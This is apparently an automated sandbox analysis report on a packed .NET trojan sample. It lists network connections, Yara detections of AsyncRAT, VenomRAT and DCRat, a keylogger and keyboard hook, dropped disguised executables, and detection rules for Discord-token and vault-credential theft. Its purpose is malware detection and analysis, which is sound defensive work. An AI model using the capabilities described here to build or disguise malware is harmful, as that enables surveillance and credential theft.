Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61243 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61244 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61245 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61247 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61248 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61251 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61252 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61255 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61256 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61258 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61259 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61260 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61262 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61266 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61271 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61273 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61274 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61278 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61279 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61282 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61286 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61289 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61291 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61292 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61293 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61295 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61297 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61298 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61299 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61300 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61301 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61302 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61304 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61306 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61307 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61309 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61310 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61311 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61312 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61313 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61317 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61319 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61320 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61321 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61322 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61324 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.Client.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Client.exe.26a68b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Client.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Loader.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED

Yara detected VenomRAT

Source: Yara match	File source: 2.2.Client.exe.26a68b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Client.exe PID: 6152, type: MEMORYSTR

Contains functionality to log keystrokes (.Net Source)

Source: Client.exe.0.dr, Keylogger.cs	.Net Code: KeyboardLayout
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout

Installs a global keyboard hook

Source: C:\Users\user\AppData\Roaming\Loader.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Loader.exe

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 20.2.Loader.exe.1d000000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 2.0.Client.exe.350000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 2.2.Client.exe.26a68b0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 20.2.Loader.exe.1d000000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 20.2.Loader.exe.1dc20000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 20.2.Loader.exe.1dc20000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 21.2.Loaader.exe.1d630000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 21.2.Loaader.exe.1d630000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 21.2.Loaader.exe.1d630000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 21.2.Loaader.exe.1d630000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 20.2.Loader.exe.1dc20000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 20.2.Loader.exe.1dc20000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 2.2.Client.exe.26a68b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 00000014.00000002.2814130598.000000001D000000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000003.00000002.2032453597.0000000002301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000012.00000002.2097619560.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3282228143.000000000313B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3282228143.0000000003126000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3394522285.000000001332A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000003.00000002.2031490283.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 00000015.00000002.3248245047.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3532252741.000000001BC21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000015.00000002.3532252741.000000001BBB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000012.00000002.2087235357.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000015.00000002.3282228143.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: Loaader.exe PID: 7280, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Client.exe, type: DROPPED	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Loader.exe, type: DROPPED	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen

PE file contains section with special chars

Source: WinDefend.exe.0.dr

Static PE information: section name: %q2hF6

PE file has nameless sections

Source: WinDefend.exe.0.dr

Static PE information: section name:

Very long command line found

Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: Commandline size = 13369
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: Commandline size = 13369
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: Commandline size = 13369
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: Commandline size = 13369

Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 2_2_00007FF848F03D5E NtProtectVirtualMemory,	2_2_00007FF848F03D5E
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Code function: 3_2_00007FF848F131DE NtProtectVirtualMemory,	3_2_00007FF848F131DE
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 18_2_00007FF848F431DE NtProtectVirtualMemory,	18_2_00007FF848F431DE
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 19_2_00007FF848F13D6E NtProtectVirtualMemory,	19_2_00007FF848F13D6E
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 19_2_00007FF848F14048 NtProtectVirtualMemory,	19_2_00007FF848F14048
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F33DBE NtProtectVirtualMemory,	20_2_00007FF848F33DBE
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F031DE NtProtectVirtualMemory,	21_2_00007FF848F031DE

Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 2_2_00007FF848F03D5E	2_2_00007FF848F03D5E
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 2_2_00007FF848F00E5D	2_2_00007FF848F00E5D
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 2_2_00007FF848F00E70	2_2_00007FF848F00E70
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Code function: 3_2_00007FF848F131DE	3_2_00007FF848F131DE
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Code function: 3_2_00007FF848F12AED	3_2_00007FF848F12AED
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF32D0	4_2_02CF32D0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF3B50	4_2_02CF3B50
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF0848	4_2_02CF0848
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF16E7	4_2_02CF16E7
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF5480	4_2_02CF5480
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF8C78	4_2_02CF8C78
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF45C0	4_2_02CF45C0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF6288	4_2_02CF6288
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF6298	4_2_02CF6298
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF6294	4_2_02CF6294
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF32A7	4_2_02CF32A7
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF78C0	4_2_02CF78C0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF70A8	4_2_02CF70A8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF70B4	4_2_02CF70B4
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF78B0	4_2_02CF78B0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF0838	4_2_02CF0838
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF7648	4_2_02CF7648
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF7639	4_2_02CF7639
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF2748	4_2_02CF2748
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF2739	4_2_02CF2739
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF546F	4_2_02CF546F
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF8C67	4_2_02CF8C67
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF7418	4_2_02CF7418
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF7428	4_2_02CF7428
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF7425	4_2_02CF7425
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF6D9D	4_2_02CF6D9D
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF6D90	4_2_02CF6D90
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF6DA0	4_2_02CF6DA0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_04F50C18	4_2_04F50C18
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_04F517B8	4_2_04F517B8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_04F50C0F	4_2_04F50C0F
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_04F51274	4_2_04F51274
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_04F5125F	4_2_04F5125F
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_04F517A8	4_2_04F517A8
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 18_2_00007FF848F431DE	18_2_00007FF848F431DE
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 18_2_00007FF848F42AED	18_2_00007FF848F42AED
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 19_2_00007FF848F10E5D	19_2_00007FF848F10E5D
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 19_2_00007FF848F13D6E	19_2_00007FF848F13D6E
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 19_2_00007FF848F10E70	19_2_00007FF848F10E70
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F41A28	20_2_00007FF848F41A28
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F41961	20_2_00007FF848F41961
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F3BCD2	20_2_00007FF848F3BCD2
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F43B28	20_2_00007FF848F43B28
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F30E5D	20_2_00007FF848F30E5D
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F6A6B8	20_2_00007FF848F6A6B8
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F43D88	20_2_00007FF848F43D88
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F33DBE	20_2_00007FF848F33DBE
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F3AF26	20_2_00007FF848F3AF26
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F6A730	20_2_00007FF848F6A730
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F42F38	20_2_00007FF848F42F38
